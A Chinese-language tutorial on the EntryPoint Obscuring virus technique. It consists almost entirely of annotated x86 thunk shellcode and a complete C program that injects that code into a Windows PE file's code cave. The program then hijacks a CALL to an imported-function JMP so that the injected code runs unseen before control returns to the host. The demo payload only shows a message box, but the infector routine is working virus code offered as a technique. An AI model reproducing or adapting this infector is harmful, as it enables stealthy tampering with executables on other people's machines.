EPO技術

什麼是EPO？
EPO是EntryPoint Obscuring技術的簡寫，意即入口模糊技術，該技術改變了傳統的修改PE
頭部的入口點，使其指向病毒代碼入口而使你的代碼得以執行的典型方法。

1. /*
2. 要插入的反彙編代碼thunk code:
3. 00401006    .   60                   PUSHAD
4. 00401007    .   9C                   PUSHFD
5. 00401008    .   E8 00000000          CALL msg.0040100D
6. 0040100D    $   5B                   POP EBX
7. 0040100E    .   81EB 0D104000        SUB EBX,msg.0040100D
8. 00401014    .   6A 00                PUSH 0
9. 00401016    .   8D83 30104000        LEA EAX,DWORD PTR DS:[EBX+401030]
10. 0040101C    .   50                   PUSH EAX
11. 0040101D    .   50                   PUSH EAX
12. 0040101E    .   6A 00                PUSH 0
13. 00401020    .   B8 78563412          MOV EAX,12345678             ;這裏感染前會被替換成正確的MessageBoxA的地址
14. 00401025    .   FFD0                 CALL EAX
15. 00401027    .   9D                   POPFD
16. 00401028    .   61                   POPAD
17. 00401029    .   FF25 3A104000        JMP DWORD PTR DS:[40103A]    ;跳到API
18. 0040102F       90                   NOP
19. 00401030    .   72 6F 62 69 6E 68 3>ASCII "robinh00d",0
20. */
21. #include <windows.h>
22. #include <stdio.h>
24. #pragma comment(lib,"kernel32.lib")
25. #pragma comment(lib,"user32.lib")
27. char szHostFile[] = "c:\\hello.exe" ;
28. PIMAGE_DOS_HEADER pImageDosHeader ;
29. PIMAGE_NT_HEADERS pImageNtHeaders ;
30. PIMAGE_SECTION_HEADER pImageSectionHeader ;
32. unsigned char thunkcode[] = "\x60\x9c\xe8\x00\x00\x00\x00\x5b"
33.                              "\x81\xeb\x0d\x10\x40\x00\x6a\x00"
34.                              "\x8d\x83\x30\x10\x40\x00\x50\x50"
35.                              "\x6a\x00\xb8\x78\x56\x34\x12\xff"
36.                              "\xd0\x9d\x61\xff\x25\x3a\x10\x40"
37.                              "\x00\x90\x72\x6f\x62\x69\x6e\x68"
38.                              "\x30\x30\x64\x00" ;
39. int main()
40. {
41.      HANDLE hFile ;
42.      HANDLE hMap ;
43.      LPVOID pMapping ;
44.      int dwGapSize ;
45.      unsigned char *pGapEntry ;
46.      int i ;
47.      PROC MsgBox ;
48.      DWORD OldEntry ;
49.      int x = 0x18 ;
50.      int vir_len ;
51.      unsigned char *pSearch ;
52.      DWORD *dwCallNextAddr ;
53.      DWORD *dwCallDataAddr ;
54.      DWORD dwCodeDistance ;
55.      DWORD *dwJmpAddr ;
56.      DWORD dwJmpData ;
57.      DWORD dwJmpVA ;
59.      //:::
60.      hFile = CreateFile(szHostFile,
61.                          GENERIC_READ | GENERIC_WRITE,
62.                          FILE_SHARE_READ | FILE_SHARE_WRITE,
63.                          NULL,
64.                          OPEN_EXISTING,
65.                          FILE_ATTRIBUTE_NORMAL,
66.                          NULL) ;
67.                         
68.      if (hFile==INVALID_HANDLE_VALUE)
69.      {
70.          printf("Open host file failed!\n") ;
71.          return -1 ;
72.      }
73.     
74.      hMap = CreateFileMapping(hFile,
75.                              NULL,
76.                              PAGE_READWRITE,
77.                              0,
78.                              0,
79.                              NULL) ;
80.      if (!hMap)
81.      {
82.          printf("Create file mapping falied!\n") ;
83.          return -1 ;
84.      }
85.     
86.      pMapping = MapViewOfFile(hMap,
87.                          FILE_MAP_ALL_ACCESS,
88.                          0,
89.                          0,
90.                          0) ;
91.      if (!pMapping)
92.      {
93.          printf("Map view of file failed!\n") ;
94.          return -1 ;
95.      }
96.     
97.      //::::::打開目標宿主文件,先檢測文件是否PE格式,定位到代碼的末尾
98.      pImageDosHeader = (PIMAGE_DOS_HEADER)pMapping ;
99.      if (pImageDosHeader->e_magic==IMAGE_DOS_SIGNATURE)
100.      {
101.          pImageNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)pMapping+pImageDosHeader->e_lfanew) ;
102.          if (pImageNtHeaders->Signature==IMAGE_NT_SIGNATURE)
103.          {
104.              //:::是合法的PE文件
105.              //:::定位到節表頭
106.              pImageSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)pMapping+
107.                                                              pImageDosHeader->e_lfanew+
108.                                                              sizeof(IMAGE_NT_HEADERS)) ;
109.              //:::計算第一個節的空隙大小
110.              dwGapSize = (int)pImageSectionHeader->SizeOfRawData - pImageSectionHeader->Misc.VirtualSize ;
111.             
112.              //:::如果代碼縫隙小於thunk code的大小則感染失敗
113.              if ((int)sizeof(thunkcode)>(int)dwGapSize)
114.              {
115.                  printf("no more space to fill!\n") ;
116.                  goto Close ;
117.                 
118.              }
119.              //:::定位到代碼末尾
120.              pGapEntry = (unsigned char *)(pImageSectionHeader->PointerToRawData+
121.                                              (DWORD)pMapping+
122.                                              pImageSectionHeader->Misc.VirtualSize) ;
123.             
124.              OldEntry = pImageNtHeaders->OptionalHeader.ImageBase+
125.                          pImageNtHeaders->OptionalHeader.AddressOfEntryPoint ;
127.              MsgBox = (PROC)GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA") ;
129.              //修改爲當前系統的MessageBoxA地址
130.              for (i=3;i>=0;i--)
131.              {
132.                  thunkcode[i+27] = ((unsigned int)MsgBox>>x)&0xff ;
133.                  x -= 8 ;
134.              }
135.              x = 24 ;
136.             
137.              vir_len = (int)pImageSectionHeader->Misc.VirtualSize ;
138.             
139.              pSearch = (unsigned char *)(pImageSectionHeader->PointerToRawData+
140.                          (DWORD)pMapping) ;
141.                         
142.              //:::搜索call指令(0xe8)
143.              for (i=0;i<vir_len;i++)
144.              {
145.                  if (pSearch[i]==0xe8)
146.                  {
147.                      //:::call指令操作數地址
148.                      dwCallDataAddr = (DWORD *)(&pSearch[i]+1) ;
149.                      //:::call下條指令地址
150.                      dwCallNextAddr=(DWORD *)(&pSearch[i]+5) ;
151.                      //:::jmp指令地址
152.                      dwJmpAddr = (DWORD *)(*dwCallDataAddr+ (DWORD)dwCallNextAddr) ;
153.                      //:::Jmp指令在內存的虛擬地址VA
154.                      dwJmpVA = (DWORD)dwJmpAddr-
155.                                  ((DWORD)pMapping+pImageSectionHeader->PointerToRawData)+
156.                                  pImageNtHeaders->OptionalHeader.ImageBase+
157.                                  pImageNtHeaders->OptionalHeader.AddressOfEntryPoint ;
158.                      //:::取jmp操作數,返回的時候使用
159.                      dwJmpData = *((DWORD *)((unsigned char *)dwJmpAddr+2)) ;
161.                      if ((*dwJmpAddr&0xffff)==0x25ff)
162.                      {
163.                          //:::修改call操作數
164.                          dwCodeDistance = (DWORD)pGapEntry - (DWORD)dwCallNextAddr ;
165.                          *dwCallDataAddr = dwCodeDistance ;
166.                          //:::原jmp裏的操作數,替換到thunk code的末尾
167.                          for (i=3;i>=0;i--)
168.                          {
169.                              thunkcode[i+37] = ((unsigned int)dwJmpData>>x)&0xff ;
170.                              x -= 8 ;
171.                          }
172.                          //把thunk code寫入目標宿主程序
173.                          for (i=0;i<sizeof(thunkcode);i++)
174.                          {
175.                              pGapEntry[i] = thunkcode[i] ;
176.                          }
177.                          break ;
178.                      }
179.                  }
180.                 
181.              }
182.             
183.          }
184.      }
185.      else
186.      {
187.          printf("Invalid file format!\n") ;
188.      }
189.      Close:
190.      UnmapViewOfFile(pMapping) ;
191.      CloseHandle(hMap) ;
192.      CloseHandle(hFile) ;
193.     
194.      return 0 ;
195. }